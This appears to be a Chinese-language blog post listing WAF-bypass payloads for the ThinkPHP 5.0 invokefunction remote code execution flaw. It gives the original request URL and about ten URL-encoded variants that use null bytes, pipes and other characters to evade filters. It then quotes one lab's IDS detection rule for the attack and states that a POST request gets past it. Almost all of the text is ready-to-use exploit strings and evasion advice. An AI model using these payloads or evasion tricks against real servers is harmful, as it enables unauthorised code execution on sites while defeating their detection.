Thinkphp代码执行漏洞WAF绕过 Thinkphp代码执行漏洞WAF绕过原始Payload:1/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1 /\不是必须的,可以用其他字符替换。 BYPASS:123456789101112131415/ /index.php?s=index%2f%00think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1| /index.php?s=index%7c%00think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1/ /index.php?s=index%00%2fthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1| /index.php?s=index%00%7cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1/\ /index.php?s=index%2f%5cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1</ /index.php?s=index%3c%2fthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1|\ /index.php?s=index%7c%5cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1<| /index.php?s=index%3c%7cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1非空白字符<xxxxxx|<xxxxxx/<%08| /index.php?s=index%3Cxxxx|think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1<%08/ /index.php?s=index%3Cxxxx/think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1 守望者实验室IDS检测规则: 1alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"this is thinkphp5.0 command execution......"; flow:established,from_client; content:"GET"; http_method; content:"?s=index/think\\app";http_uri; sid:80239763; rev:1;) 这个直接用POST请求就可以绕过。 note 在spark-shell中使用ipdb格式IP库 上一篇 Openwrt命令行登录获取Cookie与Token 下一篇
